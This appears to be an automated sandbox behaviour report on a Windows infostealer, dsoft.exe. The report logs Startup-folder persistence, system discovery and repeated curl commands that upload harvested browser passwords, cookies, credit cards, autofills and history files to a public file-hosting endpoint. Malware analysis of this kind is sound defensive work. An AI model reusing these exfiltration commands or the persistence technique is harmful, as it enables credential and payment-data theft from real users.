Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\charset_normalizer\md__mypyc.cp310-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\python310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\pywin32_system32\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\win32\_win32sysloader.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Pythonwin\win32ui.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI22482\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\dsoft.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash\_poly1305.pyd	Jump to dropped file

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: dsoft.exe, 00000001.00000003.2007705887.000002948843F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550698277.0000029488446000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550988641.0000029488454000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2556741226.0000029488456000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540034386.0000029488445000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2564670780.0000029488458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWffer%SystemRoot%\system32\mswsock.dll
Source: dsoft.exe, 00000001.00000003.2007705887.000002948843F000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679719201.000001FA5B864000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686149501.000001FA5B865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000009.00000003.2149427215.00000167975E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 0000000D.00000003.2186183663.0000022CEC935000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq

Source: C:\Windows\System32\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Users\user\Desktop\dsoft.exe "C:\Users\user\Desktop\dsoft.exe"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile

Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Cipher VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Hash VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\PublicKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\Crypto\Util VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\Desktop\dsoft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\dsoft.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69562\base_library.zip VolumeInformation	Jump to behavior
